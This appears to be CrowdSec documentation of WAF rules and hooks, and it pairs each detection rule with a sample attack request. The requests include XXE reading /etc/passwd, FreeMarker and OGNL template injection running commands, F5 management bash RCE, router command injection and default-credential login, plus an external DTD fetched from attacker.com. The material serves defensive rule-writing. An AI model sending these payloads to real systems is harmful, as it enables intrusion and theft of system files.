Skip to main content
Version: Next

WAF Rules Examples

This page showcases various WAF rule capabilities with real-world examples from the CrowdSec Hub. Each example includes the rule definition, a matching HTTP request from the test suite, and explanations of the key features demonstrated.

1. Header Analysis - Missing User Agent Detection

Description

Header inspection with count transform. Note that empty user agent-agent field or absent user-agent field is equivalent.

Rule Example

rules:
- and:
- zones:
- METHOD
match:
type: regex
value: '^GET|POST|PUT|DELETE|PATCH$'
- zones:
- HEADERS
variables:
- "User-Agent"
transform:
- count
match:
type: equals
value: "0"

HTTP Request Example

GET / HTTP/1.1
Host: example.com
User-Agent:

Key Features Demonstrated

  • Header inspection using HEADERS zone
  • Transform operations with count() to check header existence
  • HTTP method filtering with regex patterns
  • AND logic combining multiple conditions

2. Request Body Analysis - JSON Path Extraction

Description

JSON path extraction with dot notation.

Rule Example

rules:
- and:
- zones:
- METHOD
transform:
- uppercase
match:
type: equals
value: POST
- zones:
- URI
transform:
- lowercase
match:
type: contains
value: /rest/v1/guest-carts/1/estimate-shipping-methods
- zones:
- BODY_ARGS
variables:
- json.address.totalsCollector.collectorList.totalCollector.sourceData.data
transform:
- lowercase
match:
type: contains
value: "<!entity"

HTTP Request Example

POST /rest/v1/guest-carts/1/estimate-shipping-methods HTTP/1.1
Host: example.com
Content-Type: application/json

{
"address": {
"totalsCollector": {
"collectorList": {
"totalCollector": {
"sourceData": {
"data": "<!ENTITY xxe SYSTEM \"file:///etc/passwd\">",
"dataIsURL": "true"
}
}
}
}
}
}

Key Features Demonstrated

  • Deep JSON path navigation using dot notation
  • Request body parsing with BODY_ARGS zone
  • Multiple transform operations (uppercase, lowercase)
  • Complex AND conditions across different zones

3. Query Parameter Inspection - SSTI Detection

Description

Multi-zone pattern matching (ARGS and RAW_BODY).

Rule Example

rules:
- and:
- zones:
- RAW_BODY
- ARGS
transform:
- lowercase
match:
type: contains
value: 'freemarker.template.utility.execute'

HTTP Request Example

GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d HTTP/1.1
Host: example.com

Key Features Demonstrated

  • URL parameter parsing with ARGS zone
  • Multiple zone matching (RAW_BODY and ARGS)
  • String transformation with lowercase normalization
  • Pattern-based detection using contains match

4. File Upload Detection - WordPress PHP Execution

Description

URI regex matching with multiple transforms.

Rule Example

rules:
- and:
- zones:
- URI
transform:
- lowercase
- urldecode
match:
type: regex
value: '/wp-content/uploads/.*\.(h?ph(p|tm?l?|ar)|module|shtml)'

HTTP Request Example

GET /wp-content/uploads/2024/10/test.php?exec=id HTTP/1.1
Host: example.com

Key Features Demonstrated

  • URI path analysis with regex pattern matching
  • Multiple transforms (lowercase and URL decoding)
  • Complex regex patterns for file extension detection
  • WordPress-specific protection against upload directory exploitation

5. HTTP Protocol Analysis - Form Data Validation

Description

Form data analysis with variable targeting.

Rule Example

rules:
- and:
- zones:
- METHOD
transform:
- lowercase
match:
type: equals
value: post
- zones:
- URI
transform:
- lowercase
match:
type: endsWith
value: /boaform/admin/formlogin
- zones:
- BODY_ARGS
variables:
- username
transform:
- lowercase
match:
type: equals
value: "admin"
- zones:
- BODY_ARGS
variables:
- psd
transform:
- lowercase
match:
type: equals
value: "parks"

HTTP Request Example

POST /boaform/admin/formLogin HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded

username=admin&psd=parks

Key Features Demonstrated

  • Form data analysis with BODY_ARGS and specific variable targeting
  • HTTP method validation with case-insensitive matching
  • URI endpoint matching using endsWith comparison
  • Credential pattern detection for default login attempts

6. Header Names Analysis

Description

Header name inspection (HEADERS_NAMES zone).

Rule Example

rules:
- and:
- zones:
- URI
transform:
- lowercase
match:
type: contains
value: /mgmt/tm/util/bash
- zones:
- HEADERS_NAMES
transform:
- lowercase
match:
type: contains
value: x-f5-auth-token
- zones:
- HEADERS_NAMES
transform:
- lowercase
match:
type: contains
value: authorization

HTTP Request Example

POST /mgmt/tm/util/bash HTTP/1.1
Host: example.com
Connection: keep-alive, X-F5-Auth-Token
X-F5-Auth-Token: a
Authorization: Basic YWRtaW46
Content-Type: application/json

{
"command": "run",
"utilCmdArgs": "-c 'id'"
}

Key Features Demonstrated

  • Header name inspection using HEADERS_NAMES zone
  • Multiple header validation combining different authentication headers
  • Case-insensitive header matching with lowercase transform
  • API endpoint protection for management interfaces

7. Simple URI Pattern Matching - Environment File Access

Description

Simple URI pattern matching with endsWith.

Rule Example

rules:
- zones:
- URI
transform:
- lowercase
match:
type: endsWith
value: .env

HTTP Request Example

GET /foo/bar/.env HTTP/1.1
Host: example.com

Key Features Demonstrated

  • Simple URI matching without complex AND conditions
  • File extension detection using endsWith matcher
  • Case normalization with lowercase transform
  • Environment file protection for configuration security

8. Regular Expression Validation - Command Injection Detection

Description

Regex pattern matching for input validation.

Rule Example

rules:
- and:
- zones:
- METHOD
match:
type: equals
value: POST
- zones:
- URI
transform:
- lowercase
match:
type: endsWith
value: /boaform/admin/formping
- zones:
- BODY_ARGS
variables:
- target_addr
transform:
- lowercase
match:
type: regex
value: "[^a-f0-9:.]+"

HTTP Request Example

POST /boaform/admin/formPing HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded

target_addr=1.2.3.4;cat /etc/passwd

Key Features Demonstrated

  • Regex pattern matching for command injection detection
  • Character class validation to identify suspicious input
  • Form parameter filtering on specific variables
  • Command injection prevention through pattern recognition

9. Complex JSON Processing - Multi-condition XXE

Description

Multi-property JSON validation.

Rule Example

rules:
- and:
- zones:
- METHOD
transform:
- lowercase
match:
type: equals
value: post
- zones:
- URI
transform:
- lowercase
match:
type: contains
value: /rest/v1/guest-carts/1/estimate-shipping-methods
- zones:
- BODY_ARGS
variables:
- json.address.totalsCollector.collectorList.totalCollector.sourceData.data
transform:
- lowercase
match:
type: contains
value: "://"
- zones:
- BODY_ARGS
variables:
- json.address.totalsCollector.collectorList.totalCollector.sourceData.dataIsURL
transform:
- lowercase
match:
type: equals
value: "true"

HTTP Request Example

POST /rest/v1/guest-carts/1/estimate-shipping-methods HTTP/1.1
Host: example.com
Content-Type: application/json

{
"address": {
"totalsCollector": {
"collectorList": {
"totalCollector": {
"sourceData": {
"data": "http://attacker.com/malicious.dtd",
"dataIsURL": "true"
}
}
}
}
}
}

Key Features Demonstrated

  • Multi-property JSON validation checking both data content and flags
  • URL scheme detection using contains match for "://"
  • Boolean flag inspection in JSON structures
  • Complex attack vector prevention through comprehensive validation

10. Template Injection in Request Body - POST Data Analysis

Description

Raw body content analysis with multi-zone matching.

Rule Example

rules:
- and:
- zones:
- RAW_BODY
- ARGS
transform:
- lowercase
match:
type: contains
value: 'freemarker.template.utility.execute'

HTTP Request Example

POST /template/aui/text-inline.vm HTTP/1.1
Host: example.com
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded

label=aaa\u0027%2b#request.get(\u0027.KEY_velocity.struts2.context\u0027).internalGet(\u0027ognl\u0027).findValue(#parameters.poc[0],{})%2b\u0027&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader(\u0027x_vuln_check\u0027,(new+freemarker.template.utility.Execute()).exec({"whoami"}))

Key Features Demonstrated

  • POST body content analysis using RAW_BODY zone
  • Template injection detection through signature-based matching
  • URL-encoded payload handling in form submissions
  • Multi-zone coverage examining both args and raw body content

Hooks Examples

Hooks allow you to customize WAF behavior at different execution phases. This section demonstrates key hook capabilities organized by execution phase.

Pre-Evaluation Phase (pre_eval)

Pre-evaluation hooks run before rules are evaluated, allowing you to modify rule behavior dynamically per request.

1. Disable Rules by Name

Description

Dynamically disable specific rules before evaluation.

Hook Example

pre_eval:
- filter: req.URL.Path == "/admin/upload"
apply:
- RemoveInBandRuleByName('some-specific-rule')

Use Case

Disable existing rules on specific endpoints.

2. Disable Rules by Tag

Description

Disable multiple rules sharing the same tag.

Hook Example

pre_eval:
- apply:
- RemoveInBandRuleByTag('some-specific-tag')

Use Case

Disable all rules with a specific tag.

3. Change Rule Remediation by Name

Description

Modify the default remediation for specific rules.

Hook Example

pre_eval:
- apply:
- SetRemediationByName('some-rule', 'log')

Use Case

Change a blocking rule to log-only mode for testing.

4. Disable Rules by ID

Description

Disable specific rules using their unique ID during request processing.

Hook Example

pre_eval:
- filter: req.Method == "DELETE"
apply:
- RemoveInBandRuleByID(123)

Use Case

Disable a specific rule by its ID for certain endpoints or conditions where the rule may cause false positives.

Post-Evaluation Phase (post_eval)

Post-evaluation hooks run after rule evaluation is complete, primarily used for debugging and logging.

5. Debug Request Dumping

Description

Dump request details to file for debugging.

Hook Example

post_eval:
- filter: IsInBand == true
apply:
- DumpRequest().WithBody().ToJSON()

Use Case

Capture full request details for forensic analysis or debugging rule behavior.

On-Match Phase (on_match)

On-match hooks run when a rule matches, allowing you to modify the response behavior.

6. Change HTTP Response Code

Description

Modify the HTTP status code returned to users when a rule matches.

Hook Example

on_match:
- filter: IsInBand == true
apply:
- SetReturnCode(413)

Use Case

Return a 413 "Payload Too Large" instead of the default 403 when a rule triggers.

7. Change Remediation Action

Description

Dynamically change the remediation action from the default.

Hook Example

on_match:
- filter: IsInBand == true
apply:
- SetRemediation('captcha')

Use Case

Show a captcha instead of blocking the request for certain rule matches.

8. Allow Specific IPs

Description

Override blocking for trusted IP addresses.

Hook Example

on_match:
- filter: IsInBand == true && req.RemoteAddr == "192.168.1.100"
apply:
- SetRemediation('allow')

Use Case

Allow internal/admin IPs to bypass security rules while keeping protection for others.

9. Cancel Alert Generation

Description

Prevent alert creation while keeping the request blocked.

Hook Example

on_match:
- filter: IsInBand == true
apply:
- CancelAlert()

Use Case

Block suspicious requests without generating alerts for known false positives.

10. Force Alert for Out-of-Band Rules

Description

Generate alerts for monitoring rules that normally only log.

Hook Example

on_match:
- filter: IsOutBand == true
apply:
- SendAlert()

Use Case

Create alerts for reconnaissance attempts detected by monitoring rules.

11. Hook Flow Control

Description

Control execution of subsequent hooks with break/continue.

Hook Example

on_match:
- filter: IsInBand == true
apply:
- CancelEvent()
on_success: break
- filter: IsInBand == true
apply:
- SetRemediation('captcha')

Use Case

Cancel event generation and stop processing further hooks.

Hook Execution Phases Summary

  • on_load: Rule loading phase - disable/modify rules permanently
  • pre_eval: Before rule evaluation - dynamic rule modification per request
  • on_match: After rule match - modify response behavior
  • post_eval: After evaluation - debugging and logging

Summary of WAF Capabilities

These examples demonstrate the comprehensive capabilities of the CrowdSec WAF engine:

  • Zone-based analysis: Headers, URI, Body, Args, Method inspection
  • Transform operations: Case normalization, URL decoding, counting
  • Match types: Exact equals, contains, regex, endsWith patterns
  • JSON processing: Deep object navigation with dot notation
  • Complex logic: AND/OR conditions across multiple zones
  • Variable targeting: Specific parameter and header name filtering
  • Dynamic behavior: Hooks for runtime customization
  • Security coverage: XSS, SQLi, SSTI, XXE, RCE, and configuration exposure protection